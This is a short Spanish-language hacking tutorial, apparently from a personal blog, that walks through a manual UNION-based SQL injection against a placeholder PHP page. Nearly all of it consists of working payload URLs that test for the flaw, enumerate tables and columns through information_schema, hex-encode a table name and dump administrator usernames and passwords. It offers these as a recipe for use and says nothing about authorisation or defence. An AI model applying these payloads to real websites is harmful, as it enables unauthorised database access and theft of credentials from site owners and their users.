SQL manual

http://www.tupagina.com/contenido.php?id=6' para saber si es vulnerable

http://www.tupagina.com/contenido.php?id=-6+union+select+1,2,3,4,5,6,7--

y nos muestra  2 y 3 es la tablas

usaremos el 2 y ponemos esto = replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29

y al final de la url ponemos esto = +from+information_schema.tables--

2 paso = nos vamos a esta pag= http://www.swingnote.com/tools/texttohex.php

y en string borramos y ponemos la table que queremos convertir y nos dara el Hexadecimal ^^
en mi caso fue 61646d696e5f7573657273

3 paso = borramos el código que aviamos puesto antes este replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y lo remplasamos por column_name
  y al final le ponemos este codigo = columns+where(table_name=0xaqui el codigo)limit+1,1--

luego donde dic aquí el codigo que convertimos lo ponemos y en tables borramos y ponemos el codigo

fin del codigo http://www.tupagina.com/contenido.php?id=-6+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e5f7573657273)limit+1,1--


despues ponemos en los numeros de están +1,1--  de 1 a 2 y 3  esto es para que vaya revelando las columnas

4 paso == revelar culumnas borramos column_name y ponemos esto = group_concat(admin_username,0x3a,admin_password)
son las columnas q keremos revelar  y al final borrar de información todo y ponemos  terminar con el nombre de la tabla ;)

+admin_users

codigo final

http://www.tupagina.com/contenido.php?id=-6+union+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6,7+from+admin_users--

####################################################################################

Facebook: https://www.facebook.com/Claudiospik3
Twitter: https://twitter.com/Claudiospik3
Blog: http://claudiospik3.blogspot.com
Página: http://Claudiospik3.tuars.com ( En actualización )
E-mail: Claudiospik3@gmail.com

Gracias por visitarnos